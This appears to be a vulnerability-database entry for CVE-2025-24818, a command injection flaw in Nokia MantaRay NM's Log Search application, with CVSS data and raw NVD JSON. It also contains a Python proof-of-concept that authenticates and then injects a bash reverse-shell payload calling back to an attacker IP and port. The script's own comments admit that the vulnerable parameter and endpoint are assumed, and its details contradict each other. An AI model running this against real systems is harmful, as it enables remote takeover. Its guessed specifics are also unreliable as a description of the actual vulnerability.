Security Vulnerability Report
CVE-2025-24818 CVSS 8.0 HIGH

Published: 2026-04-07 16:16:23
Last Modified: 2026-04-22 18:54:41
Source: b48c3b8f-639e-4c16-8725-497bc411dad0

Description

Nokia MantaRay NM is vulnerable to OS command injection due to improper neutralization of special elements used in an OS command in the Log Search application.

CVSS Details

CVSS Score: 8.0
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nokia:mantaray_nm:*:*:*:*:*:*:*:* - VULNERABLE
Nokia MantaRay NM (see the official advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2025-24818 (OS Command Injection in Nokia MantaRay NM)
# This script demonstrates the vulnerability by sending a malicious payload to the Log Search endpoint.
import requests
import sys

# Configuration
TARGET_URL = "https://<TARGET_IP>/log_search_endpoint"  # Replace with actual endpoint
ATTACKER_IP = "192.168.1.100"
ATTACKER_PORT = 4444

def exploit(target_ip, username, password):
    session = requests.Session()

    # 1. Authenticate to get a valid session (Low privilege required)
    login_url = f"{target_ip}/login"
    login_data = {"username": username, "password": password}
    session.post(login_url, data=login_data, verify=False)

    # 2. Craft the OS Command Injection payload
    # Attempting to execute a reverse shell using bash
    # The vulnerable parameter is assumed to be 'search_term'
    payload = f"; /bin/bash -c 'bash -i >& /dev/tcp/{ATTACKER_IP}/{ATTACKER_PORT} 0>&1'"

    # 3. Send the request to the vulnerable Log Search application
    exploit_url = f"{target_ip}/api/log/search"
    params = {
        "query": payload,
        "module": "system"
    }

    try:
        print(f"[*] Sending payload to {exploit_url}...")
        response = session.get(exploit_url, params=params, verify=False, timeout=5)
        print(f"[*] Response status: {response.status_code}")
        print("[*] Check your netcat listener for a shell connection.")
    except Exception as e:
        print(f"[-] Exploit failed: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_ip> <username> <password>")
        sys.exit(1)
    exploit(sys.argv[1], sys.argv[2], sys.argv[3])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-24818", "sourceIdentifier": "b48c3b8f-639e-4c16-8725-497bc411dad0", "published": "2026-04-07T16:16:22.813", "lastModified": "2026-04-22T18:54:40.833", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nokia MantaRay NM is vulnerable to an OS command injection vulnerability due to improper neutralization of special elements used in an OS command in Log Search application."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nokia:mantaray_nm:*:*:*:*:*:*:*:*", "versionEndExcluding": "25r1-nm", "matchCriteriaId": "C678CD07-A42D-4168-8852-9C232E8DA11B"}]}]}], "references": [{"url": "https://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-2025-24818/", "source": "b48c3b8f-639e-4c16-8725-497bc411dad0", "tags": ["Vendor Advisory"]}]}}